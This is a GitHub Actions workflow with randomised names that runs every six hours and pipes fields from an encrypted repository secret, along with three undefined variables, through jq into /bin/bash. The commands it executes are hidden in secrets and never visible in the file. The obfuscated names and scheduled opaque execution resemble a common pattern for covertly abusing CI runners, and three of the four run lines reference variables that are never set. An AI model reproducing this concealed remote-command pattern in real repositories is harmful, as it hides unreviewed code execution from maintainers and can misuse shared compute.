name: xucijiu3176
on:
  workflow_dispatch:
  schedule:
    - cron: '16 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: xucijiu3176
        env:
          rgwy0: ${{ secrets.rgwy0 }}
        run: |
          echo $rgwy0 | jq -r .cj42 | /bin/bash
          echo $sogg05797 | jq -r .dj5 | /bin/bash
          echo $hc715 | jq -r .mofnq904 | /bin/bash
          echo $wygt274 | jq -r .whfm67 | /bin/bash

